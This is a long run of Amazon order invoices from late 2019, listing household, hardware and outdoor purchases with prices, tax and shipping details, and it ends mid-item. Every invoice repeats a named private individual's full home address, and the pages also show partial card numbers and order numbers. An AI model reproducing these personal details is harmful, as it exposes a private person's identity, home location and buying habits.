your records. Payment Method: Visa | Last digits: 1241 Item(s) Subtotal: $31.35 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $31.35 Estimated tax to be collected: $1.88 ---- WASHINGTON, DC 20010-3139 Grand Total:$33.23 United States Credit Card transactions Visa ending in 1241: December 11, 2019:$18.41 Visa ending in 1241: December 4, 2019:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1337768-4578654 Order Placed: December 2, 2019 Amazon.com order number: 111-1337768-4578654 Seller's order number: SO14779338 Order Total: $17.27 Shipped on December 3, 2019 Items Ordered 1 of: Clauss 18798 8-in-1 Titanium Non-Stick Painter's Tool Sold by: Lighting Sales LLC (seller profile) Price $16.29 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.29 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $16.29Brian Coady Estimated tax to be collected: $0.981454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$17.27 United States Credit Card transactions Visa ending in 1241: December 3, 2019:$17.27 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5563768-9039460 Order Placed: December 1, 2019 Amazon.com order number: 111-5563768-9039460 Order Total: $62.74 Shipped on December 3, 2019 Items Ordered Price 1 of: Powered USB Hub -ACASIS 16 Ports 90W USB 3.0 Data Hub -with Individual On/Off Switches and 12V/7.5A Power Adapter USB Hub 3.0 Splitter for Laptop, PC, Computer, Mobile HDD, Flash Drive and More Sold by: Acasis Direct US (seller profile) $59.19 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $59.19 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $59.19 Brian Coady Estimated tax to be collected: $3.551454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$62.74 United States Credit Card transactions Visa ending in 1241: December 3, 2019:$62.74 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9175635-3929833 Order Placed: December 1, 2019 Amazon.com order number: 111-9175635-3929833 Order Total: $31.85 Shipped on December 3, 2019 Items Ordered Price 2 of: Adafruit Large Modular Snap Box -SMD component storage -Orange [ADA434] $6.01 Sold by: Emerging Tech Sales (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 3, 2019 Items Ordered Price 1 of: Adafruit Large Modular Snap Box -SMD component storage -Orange [ADA434] $6.01 Sold by: Emerging Tech Sales (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on December 3, 2019 Items Ordered Price 2 of: Adafruit Large Modular Snap Box -SMD component storage -Orange [ADA434] $6.01 Sold by: Emerging Tech Sales (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $30.05 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $30.05Brian Coady Estimated tax to be collected: $1.801454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$31.85 United States Credit Card transactions Visa ending in 1241: December 3, 2019:$31.85 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3909600-3125809 Order Placed: December 1, 2019 Amazon.com order number: 111-3909600-3125809 Order Total: $6.23 Shipped on December 2, 2019 Items Ordered Price 1 of: Loctite TITEFOAM Insulating Foam Sealant, One 12 Ounce Can (1988753) Sold by: Amazon.com Services LLC $5.88 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $5.88 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $5.88 Brian Coady Estimated tax to be collected: $0.35 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$6.23 United States Credit Card transactions Visa ending in 1241: December 2, 2019:$6.23 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8276038-5827456 Order Placed: November 30, 2019 Amazon.com order number: 111-8276038-5827456 Order Total: $103.74 Shipped on December 2, 2019 Items Ordered Price 1 of: OHill Cable Clips, 16 Pack Black Cord Organizer Cable Management for $6.99 Organizing Cable Cords Home and Office, Self Adhesive Cord Holders Sold by: OHill Direct (seller profile) | Product question? Ask Seller Condition: New 2 of: Pet Heating Pad,Dog Electric Heating Pad,19.7''x15.8'' Waterproof Heating Pad $32.70 for Cats,Heated Mat Bed Safety Heating Indoor Adjustable Warming Mat for Pets with 6.9Ft Length Chew Resistant Steel Cord Sold by: LESOTC Design Store (seller profile) Condition: New 1 of: Milliard Electric Therapy Heating Pad for Fast Pain Relief -Gray -15in x 12in $17.99 Sold by: Home Wise (seller profile) Condition: New 1 of: Sliver Gripper Key Chain Tweezer & Magnifier Combo $7.49 Sold by: Sliver Gripper (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Grand Total:$103.74 Payment information Payment Method: Visa | Last digits: 1241 Item(s) Subtotal: Shipping & Handling: $97.87 $0.00 Billing address Brian Coady 1454 MONROE ST NW Total before tax: Estimated tax to be collected: $97.87 $5.87 WASHINGTON, DC 20010-3139 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-8256182-8010625 Order Placed: November 29, 2019 Amazon.com order number: 113-8256182-8010625 Order Total: $94.91 Shipped on November 30, 2019 Items Ordered 1 of: Maxboost Car Mount, [2 Pack] Universal Air Vent Magnetic Phone Car Mounts Holder for iPhone 11 Pro Xs Max XR X 8 7 Plus 6S SE, Galaxy S10 S10e 5G S9, LG,Note 10 and Mini Tablet (Compatible Most Case) Sold by: power-innovation (seller profile) Price $7.99 Condition: New 1 of: AmazonBasics 1.45 Volt Hearing Aid Batteries -Pack of 60, Size 312 Sold by: Amazon.com Services LLC $14.76 Condition: New 1 of: Topspeeder 18 Pack Rings Curtain Clips with Rings Rustproof Drapery Rings on Rod Strong Metal Decorative Drapery Window Curtain Ring with Clip Vintage Black Sold by: Topspeeder Technology Co.,Ltd (seller profile) $6.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on November 30, 2019 Items Ordered 1 of: LYFNLOVE USB Hub 3.0 Splitter,7 Port USB Data Hub with Power Adapter and One Charging Port,Individual On/Off Switches and Lights for Laptop, PC, Computer, Mobile HDD, Flash Drive and More Sold by: LYFNLOVE Direct (seller profile) Price $20.69 Condition: New 1 of: TOPGO [Upgraded] Cup Holder Phone Mount Universal Adjustable Gooseneck Cup Holder Cradle Car Mount for Cell Phone iPhone Xs/XS Max/X/8/7 Plus/Galaxy Sold by: TOPGO Direct (seller profile) $20.99 Condition: New Print this page for your records. 1 of: Gorilla Grip 25053-26 Non-Slip Work Gloves (Large) Sold by: Amazon.com Services LLC $4.96 Condition: New 1 of: Docooler 4-in-1 Network Cable Tester Remote RJ11 RJ45 USB BNC LAN Cat5 Cat6 Phone Cable Tester Meter Sold by: KIMTON (seller profile) $13.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $90.37 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $90.37 Brian Coady Estimated tax to be collected: $4.541454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$94.91 United States Credit Card transactions Visa ending in 1241: November 30, 2019:$94.91 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0179992-0844242 Order Placed: November 29, 2019 Amazon.com order number: 113-0179992-0844242 Order Total: $18.01 Shipped on December 3, 2019 Items Ordered Price 1 of: Optimal Shop 2 In 1 HDMI Cable Tester and Network Cable Tester,RJ45 Cat5 Cat6 HDMI Wire Tester Sold by: Optimal Shop (seller profile) $16.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $16.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $16.99Brian Coady Estimated tax to be collected: $1.021454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$18.01 United States Credit Card transactions Visa ending in 1241: December 3, 2019:$18.01 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0054633-1083410 Order Placed: November 27, 2019 Amazon.com order number: 111-0054633-1083410 Order Total: $32.84 Shipped on November 27, 2019 Items Ordered Price 1 of: Powered USB Hub, BYEASY Aluminum USB 3.0 Hub 4 Ports with Power Adapter and 1 BC 1.2 Charging Port, Ultra Slim USB Splitter for iMac Pro, MacBook Air/Mini, PS4, Surface Pro, Notebook PC, Laptop, HDD Sold by: BYEASY Group (seller profile) $18.99 Condition: New 1 of: Ball Bungee Cords, Qtimal 30 Pack of 3 Sizes Tarp & Canopy Shock Cords, Extreme Heavy Duty Gazebo Tarp Tie Down Cord Sold by: Qtimal Direct (seller profile) $11.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $30.98 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $30.98 Brian Coady Estimated tax to be collected: $1.86 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$32.84 United States Credit Card transactions Visa ending in 1241: November 27, 2019:$32.84 Final Details for Order #111-0253933-2725042 Order Placed: November 25, 2019 Amazon.com order number: 111-0253933-2725042 Order Total: $36.54 Shipped on November 27, 2019 Items Ordered Price 1 of: Wiha 35393 5 Piece Mini L-Key Short Hex SAE Set Sold by: Amazon.com Services LLC $7.48 Condition: New 1 of: HORUSDY Hex Key Set, Allen Wrench Set Inch/Metric 30-Piece MM(0.7mm10mm) SAE(0.028"-3/8) -Best Unique Tool Gift for Men Sold by: HORUSDY (seller profile) | Product question? Ask Seller $11.99 Condition: New 1 of: RIMIX Outdoor Waterproof Windproof Thermal Fleece Down Cap Hat,Men Women $15.00 Cycling Ski Hiking Thickness Hats,Winter Camping Sleep Cap Sold by: Elong (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $34.47 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $34.47 Brian Coady Estimated tax to be collected: $2.07 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$36.54 United States Credit Card transactions Visa ending in 1241: November 27, 2019:$36.54 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-2757745-8137848 Subscribe and Save Order Placed: November 24, 2019 Amazon.com order number: 111-2757745-8137848 Order Total: $13.99 This order contains Subscribe & Save items. Shipped on December 1, 2019 Items Ordered Price 1 of: Raid Multi Insect Killer, Orange Breeze, 15 OZ (Pack -1) Sold by: Amazon.com Services LLC $13.90 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.90 Visa | Last digits: 1241 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.70 Billing address Total before tax: $13.20Brian Coady Estimated tax to be collected: $0.791454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$13.99 United States Credit Card transactions Visa ending in 1241: December 1, 2019:$13.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8387356-3768268 Subscribe and Save Order Placed: November 24, 2019 Amazon.com order number: 113-8387356-3768268 Order Total: $6.41 This order contains Subscribe & Save items. Shipped on December 6, 2019 Items Ordered Price 1 of: Amazon Brand -Solimo Vitamin D3 50 mcg (2000 IU), 365 Softgels, Value Size -$6.75 One Year Supply Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $6.75 Visa | Last digits: 1241 Shipping & Handling: $0.00 Subscribe & Save:-$0.34 Billing address Brian Coady Total before tax: $6.411454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total: $6.41 Credit Card transactions Visa ending in 1241: December 6, 2019:$6.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-8606242-4968267 Subscribe and Save Order Placed: November 23, 2019 Amazon.com order number: 112-8606242-4968267 Order Total: $12.34 This order contains Subscribe & Save items. Shipped on December 6, 2019 Items Ordered Price 1 of: Amazon Brand -Solimo Coenzyme Q10 100 mg -Normal Energy Production, Supports Cardiovascular Health -3 Month Supply (90 Softgels) Sold by: Amazon.com Services LLC $12.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.65 Billing address Total before tax: $12.34Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.34 United States Credit Card transactions Visa ending in 1241: December 6, 2019:$12.34 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5136477-9880211 Order Placed: November 20, 2019 Amazon.com order number: 111-5136477-9880211 Order Total: $6.35 Shipped on November 21, 2019 Items Ordered Price 1 of: Kwik Bandit Reusable All-Weather EPDM Rubber Cable and Cord Bundling Tie Wraps, Made in Canada -10 lbs TS (8 inch -5 Pack) Sold by: Kwik Bandit (seller profile) $5.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $5.99 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $5.99Brian Coady Estimated tax to be collected: $0.36 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$6.35 United States Credit Card transactions Visa ending in 1241: November 21, 2019:$6.35 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3089814-9915422 Order Placed: November 20, 2019 Amazon.com order number: 111-3089814-9915422 Order Total: $54.64 Shipped on November 21, 2019 Items Ordered Price 1 of: 1ft Mini Extension Cords – Short Power Strip/Adapter Cable, 3 Prong Plug, 16AWG 13A (10 Pack, 1 Foot) Sold by: Melca (seller profile) $14.99 Condition: New 1 of: summery life 3/4 inch GHT Solid Brass Garden Hose Quick Connect Garden Hose $14.59 Fitting Male and Female, Water Hose Connectors Quick Hose End Connector , 3 Sets/ 6 Pc Sold by: summery life (seller profile) Condition: New 1 of: Gorilla Heavy Duty Double Sided Mounting Tape, 1 Inch x 60 Inches, Black(Pack $11.99 of 2) Sold by: Amazon.com Services LLC Condition: New 1 of: 6 inch 25 Piece Heavy Duty 5mm Ball Bungee Canopy Cord By Wellmax, Black $9.97 Color Sold by: Wellmax (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $51.54 Visa | Last digits: 1241 Shipping & Handling: $0.00 Billing address Total before tax: $51.54 Brian Coady Estimated tax to be collected: $3.10 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$54.64 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-1944903-3759423 Order Placed: November 16, 2019 Amazon.com order number: 111-1944903-3759423 Order Total: $18.95 Shipped on November 17, 2019 Items Ordered Price 1 of: Cat 6 Ethernet Cable 25 ft (at a Cat5e Price but Higher Bandwidth) Cat6 Internet Network Cable -Flat Ethernet Patch Cable Short -Black Computer LAN Cable -Enjoy High Speed Surfing Sold by: CableGeeker Direct (seller profile) $7.89 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Shipped on November 17, 2019 Items Ordered Price 1 of: AmazonBasics Braided 4k HDMI to HDMI Cable -10-Foot $9.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $17.88 Visa | Last digits: 7528 Shipping & Handling: $0.00 ---- Billing address Total before tax: $17.88 Brian Coady Estimated tax to be collected: $1.07 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total:$18.95 United States Credit Card transactions Visa ending in 7528: November 17, 2019:$18.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-0249668-2429839 Order Placed: November 16, 2019 Amazon.com order number: 111-0249668-2429839 Order Total: $5.09 Shipped on November 18, 2019 Items Ordered Price 1 of: Curly No-Tie Shoelaces, Black Sold by: Amazon.com Services LLC $4.80 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $4.80 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $4.80 Brian Coady Estimated tax to be collected: $0.29 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$5.09 United States Credit Card transactions Visa ending in 7528: November 18, 2019:$5.09 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9691927-5619433 Order Placed: November 16, 2019 Amazon.com order number: 111-9691927-5619433 Seller's order number: 6821185 Order Total: $15.12 Shipped on November 18, 2019 Items Ordered Price 1 of: Orion Safety Products 3153-08 3-15 Minute Road Flares (1 Pack of 3 Flares)Model # 3153-08 Sold by: Evenu (seller profile) $14.26 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.26 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Billing address Total before tax: $14.26 Brian J Coady Estimated tax to be collected: $0.861454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.12 United States Credit Card transactions MasterCard ending in 3104: November 18, 2019:$15.12 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8761510-0042617 Order Placed: November 16, 2019 Amazon.com order number: 111-8761510-0042617 Order Total: $10.59 Shipped on November 17, 2019 Items Ordered Price 1 of: DOT-C2 White Reflective Tape, Reflector Conspicuity Tape Stickers High Intensity $9.99 Waterproof (2'' × 20') Sold by: PROSHADE USA (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $9.99 MasterCard | Last digits: 3104 Shipping & Handling: $0.00 Billing address Total before tax: $9.99Brian J Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.59 United States Credit Card transactions MasterCard ending in 3104: November 17, 2019:$10.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7237278-9526628 Order Placed: November 16, 2019 Amazon.com order number: 111-7237278-9526628 Order Total: $3.21 Shipped on November 26, 2019 Items Ordered Price 1 of: Scotch Duct Tape, Tangerine Orange, 1.88-Inch by 20-Yard Sold by: Amazon.com Services LLC $3.03 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $3.03 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $3.03 Brian Coady Estimated tax to be collected: $0.18 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$3.21 United States Credit Card transactions Visa ending in 7528: November 26, 2019:$3.21 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6653173-5231466 Order Placed: November 16, 2019 Amazon.com order number: 111-6653173-5231466 Order Total: $14.38 Shipped on November 20, 2019 Items Ordered Price 1 of: 3M All Weather Duct Tape, 2230, 1.88 Inches by 30 Yards Sold by: Amazon.com Services LLC $4.59 Condition: New 1 of: 3" x 25 yd 7.5 Mil Thick Tan Duct Tape PE Coated Weather Resistant (2.83 in 72MM) Sold by: On Pointe Distribution (seller profile) $8.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $13.56 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $13.56Brian Coady Estimated tax to be collected: $0.821454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.38 United States Credit Card transactions Visa ending in 7528: November 20, 2019:$14.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5801984-1009831 Order Placed: November 15, 2019 Amazon.com order number: 111-5801984-1009831 Order Total: $15.89 Shipped on November 16, 2019 Items Ordered Price 1 of: Alemon Small to XXLarge Stuff Sack Lightweight Nylon Mesh Drawstring Storage $14.99 Bag for Travelling Hiking, Set of 5 Sold by: Alemon Store (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.99Brian Coady Estimated tax to be collected: $0.901454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.89 United States Credit Card transactions Visa ending in 7528: November 16, 2019:$15.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8178172-6424213 Order Placed: November 15, 2019 Amazon.com order number: 111-8178172-6424213 Order Total: $10.59 Shipped on November 20, 2019 Items Ordered Price 1 of: Vehicle OCD -Center Console Organizer for Subaru Outback (2015-2019) -Made $9.99 in USA Sold by: Salex Organizers (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Amazon Day Delivery Payment information Payment Method: Item(s) Subtotal: $9.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.99Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.59 United States Credit Card transactions Visa ending in 7528: November 20, 2019:$10.59 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0388412-2405862 Order Placed: November 15, 2019 Amazon.com order number: 111-0388412-2405862 Order Total: $42.38 Shipped on November 20, 2019 Items Ordered Price 1 of: Bosch Bosch L-RACK-T Top Handle for use with L-RACK-S $19.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on November 19, 2019 Items Ordered Price 1 of: Bosch Bosch L-RACK-T Top Handle for use with L-RACK-S $19.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $39.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $39.98 Brian Coady Estimated tax to be collected: $2.40 1454 MONROE ST NW ---- WASHINGTON, DC 20010-3139 Grand Total:$42.38 United States Credit Card transactions Visa ending in 7528: November 20, 2019:$42.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-4017053-2686600 Order Placed: November 15, 2019 Amazon.com order number: 111-4017053-2686600 Order Total: $66.01 Shipped on November 16, 2019 Items Ordered Price 1 of: TheFitLife Flexible Metal Garden Hose -25/50/75/100 FT 304 Stainless Steel $29.34 Water Hose with Newest Spray Nozzle and Solid Metal Fittings, Lightweight, Kink Free, Durable and Easy to Store (25 Feet) Sold by: TheFitLife (seller profile) Condition: New 1 of: TheFitLife Flexible Metal Garden Hose -25/50/75/100 FT 304 Stainless Steel $37.34 Water Hose with Newest Spray Nozzle and Solid Metal Fittings, Lightweight, Kink Free, Durable and Easy to Store (50 Feet) Sold by: TheFitLife (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $66.68 Visa | Last digits: 7528 Shipping & Handling: $0.00 Your Coupon Savings: -$4.40 Billing address Brian Coady Total before tax: $62.28 1454 MONROE ST NW Estimated tax to be collected: $3.73 WASHINGTON, DC 20010-3139 United States Grand Total:$66.01 Credit Card transactions Visa ending in 7528: November 16, 2019:$66.01 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-8608388-3984226 Order Placed: November 15, 2019 Amazon.com order number: 111-8608388-3984226 Order Total: $74.19 Shipped on November 16, 2019 Items Ordered Price 1 of: Keith Titanium Ti3032 Sport Bottle -23.6 fl oz (Limited Time Price) Sold by: KEITH TITANIUM (seller profile) $48.00 Condition: New 1 of: ALASKA BEAR -Natural Silk Balaclava Face Mask for Winter, Unisex Sold by: Alaska Bear (seller profile) | Product question? Ask Seller $21.99 Condition: New ALASKA BEAR -Natural Silk Balaclava Windproof Face Mask for Skiing, Motorcycling & Outdoor Sports Designed to fit all head sizes. Without limiting peripheral vision while you're playing outside; Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $69.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $69.99 Brian Coady Estimated tax to be collected: $4.201454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$74.19 United States Credit Card transactions Visa ending in 7528: November 16, 2019:$74.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-4317511-5867447 Order Placed: November 15, 2019 Amazon.com order number: 111-4317511-5867447 Order Total: $80.66 Shipped on November 18, 2019 Items Ordered Price 1 of: Explopur Titanium Water Bottle 500ml Double Walled Vacuum Insulated Sports Water Bottle Sold by: Minimini (seller profile) $76.09 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $76.09 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $76.09Brian Coady Estimated tax to be collected: $4.571454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$80.66 United States Credit Card transactions Visa ending in 7528: November 18, 2019:$80.66 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1488699-9363445 Order Placed: November 15, 2019 Amazon.com order number: 111-1488699-9363445 Order Total: $10.06 Shipped on November 19, 2019 Items Ordered Price 1 of: Excellent 100% High quality Pure Silk with Nylon Keep Warm Winter Breathable Gloves (Size: M ) Sold by: Jambo Group (seller profile) $9.49 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.49 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.49Brian Coady Estimated tax to be collected: $0.571454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.06 United States Credit Card transactions Visa ending in 7528: November 19, 2019:$10.06 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2134202-5410615 Order Placed: November 13, 2019 Amazon.com order number: 111-2134202-5410615 Order Total: $10.56 Shipped on November 28, 2019 Items Ordered Price 1 of: 100% Pure Silk Thermal Liner Gloves Inner for Bikers, Skiers, Dog Walkers, 